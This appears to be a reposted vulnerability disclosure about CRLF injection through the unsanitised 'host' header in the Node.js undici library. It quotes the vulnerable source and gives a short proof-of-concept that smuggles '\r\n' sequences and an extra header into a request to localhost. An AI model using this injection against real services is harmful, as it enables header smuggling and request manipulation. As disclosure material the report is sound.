CRLF Injection in Nodejs ‘undici’ via host

渗透技巧 1个月前 admin

105 0 0

Summary:

undici library should be protects HTTP headers from CRLF injection vulnerabilities. However, CRLF injection exists in the ‘host’ header of undici.request api.

Description:

like https://hackerone.com/reports/1664019 Source code: lib/core/request.js:296

function processHeader (request, key, val) {
if (val && (typeof val === 'object' && !Array.isArray(val))) {
throw new InvalidArgumentError(`invalid ${key} header`)
} else if (val === undefined) {
return
}

if (
request.host === null &&
key.length === 4 &&
key.toLowerCase() === 'host'
) {
// Consumed by Client
request.host = val // without headerCharRegex.exec(val)
} else if (
request.contentLength === null &&
...

Example:

import { request } from 'undici'

const unsanitizedContentTypeInput = '12 \r\n\r\naaa:aaa'

const {
statusCode,
headers,
trailers,
body
} = await request('http://127.0.0.1:23333', {
method: 'GET',
headers: {
'content-type': 'application/json',
'host': unsanitizedContentTypeInput
}
})

console.log('response received', statusCode)
console.log('headers', headers)

for await (const data of body) {
console.log('data', data)
}

console.log('trailers', trailers)

CRLF Injection in Nodejs ‘undici’ via host